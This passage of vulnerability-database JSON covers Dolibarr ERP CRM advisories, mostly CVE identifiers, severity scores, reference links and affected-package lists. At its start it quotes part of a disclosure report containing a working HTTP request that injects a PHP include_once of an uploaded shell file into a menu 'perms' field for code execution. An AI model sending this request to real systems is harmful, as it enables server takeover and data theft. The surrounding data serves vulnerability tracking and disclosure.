http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=e71337659d7cbae16b0279b4e04535aa&menu_handler=all&user=2&type=left&propertymainmenu=whaoamia&menuIdParent=123&titre=whaoamia&picto=whaoamia&url=whaoamia&langs=&position=100&enabled=1&perms=include_once('/var/www/html/documents/users/1/shell')&target=&save=Save\n```\n\n(4) Finally, when we access the Menu we just created, we can find that the \"/var/www/html/documents/users/1/shell\" file is included:\n\n![image-20240228231800914](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231800914.png)\n\nFinally, arbitrary code execution was successfully achieved:\n\n![image-20240228231703417](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231703417.png)\n\n![image-20240228232116013](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228232116013.png)\n\n# Impact\n\nThis vulnerability can run arbitrary commands in the file system and read sensitive files.\n\n# Say it at the end\n\nIf you confirm the vulnerability, please apply for a CVE to notify all users to update.","references":[{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2"},{"reference_url":"https://github.com/advisories/GHSA-49xw-hw94-fmv2","reference_id":"GHSA-49xw-hw94-fmv2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-49xw-hw94-fmv2"}],"fixed_packages":[],"aliases":["GHSA-49xw-hw94-fmv2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rjd3-a1ds-skdp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/62702?format=json","vulnerability_id":"VCID-rtec-tutp-m3ep","summary":"Dolibarr ERP CRM before 19.0.2-php8.2 was discovered to contain a remote code execution (RCE) vulnerability via the Computed field parameter under the Users Module Setup function.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-40137","reference_id":"","reference_type":"","scores":[{"value":"0.0048","scoring_system":"epss","scoring_elements":"0.65523","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-40137"},{"reference_url":"https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137","reference_id":"CVE-2024-40137","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-25T16:09:38Z/"}],"url":"https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-40137","reference_id":"CVE-2024-40137","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-40137"},{"reference_url":"https://github.com/advisories/GHSA-vprp-94p9-5jp8","reference_id":"GHSA-vprp-94p9-5jp8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vprp-94p9-5jp8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31892?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-40137","GHSA-vprp-94p9-5jp8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rtec-tutp-m3ep"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/297197?format=json","vulnerability_id":"VCID-s6s3-p34a-muh3","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-9435","reference_id":"","reference_type":"","scores":[{"value":"0.00331","scoring_system":"epss","scoring_elements":"0.56408","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-9435"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/develop/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/develop/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/70636cc59ffa1ffbc0ce3dba315d7d9b837aad04","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/70636cc59ffa1ffbc0ce3dba315d7d9b837aad04"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-9435","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-9435"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/386577?format=json","purl":"pkg:composer/dolibarr/dolibarr@5.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1nww-vebc-rfe7"},{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-375c-7shu-37bu"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-53d8-7k7n-vud1"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-65zj-gtdx-7ydm"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-884a-z62x-dyhq"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jmau-m9qu-s3h6"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qyxz-nb5d-3qa8"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.3"}],"aliases":["CVE-2017-9435","GHSA-v3m8-7h3p-6j5m"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s6s3-p34a-muh3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/337022?format=json","vulnerability_id":"VCID-snwr-xzcb-rfdr","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"0.00326","scoring_system":"epss","scoring_elements":"0.55988","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25957"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/87f9530272925f0d651f59337a35661faeb6f377","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/87f9530272925f0d651f59337a35661faeb6f377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25957"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25957"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/391503?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/19977?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25957","GHSA-c32w-3cqh-f6jx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-snwr-xzcb-rfdr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/208293?format=json","vulnerability_id":"VCID-spzz-de9a-g3gw","summary":"Logic error in dolibarr/dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0746","reference_id":"","reference_type":"","scores":[{"value":"0.00215","scoring_system":"epss","scoring_elements":"0.44117","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0746"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21"},{"reference_url":"https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0746","reference_id":"CVE-2022-0746","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0746"},{"reference_url":"https://github.com/advisories/GHSA-8vq6-5f66-hp3r","reference_id":"GHSA-8vq6-5f66-hp3r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8vq6-5f66-hp3r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19494?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-bjem-6exd-9kf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0746","GHSA-8vq6-5f66-hp3r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-spzz-de9a-g3gw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/313682?format=json","vulnerability_id":"VCID-szp5-96ea-jua5","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19209","reference_id":"","reference_type":"","scores":[{"value":"0.01557","scoring_system":"epss","scoring_elements":"0.81869","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19209"},{"reference_url":"https://herolab.usd.de/security-advisories/usd-2019-0051","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/security-advisories/usd-2019-0051"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19209","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19209"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384973?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3zrg-f35e-ayea"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3"}],"aliases":["CVE-2019-19209","GHSA-jh3j-xfv2-f9m9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-szp5-96ea-jua5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/158767?format=json","vulnerability_id":"VCID-t393-s4zx-uyhs","summary":"An Improper Authorization vulnerability exists in Dolibarr versions prior to the 'develop' branch. A user with restricted permissions in the 'Reception' section is able to access specific reception details via direct URL access, bypassing the intended permission restrictions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3991","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1643","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3991"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3991","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3991"},{"reference_url":"https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67","reference_id":"58ddbd8a-0faf-4b3f-aec9-5850bb19ab67","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/"}],"url":"https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f","reference_id":"63cd06394f39d60784d6e6a0ccf4867a71a6568f","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f"},{"reference_url":"https://github.com/advisories/GHSA-wppr-j57c-8jpm","reference_id":"GHSA-wppr-j57c-8jpm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-wppr-j57c-8jpm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/18669?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{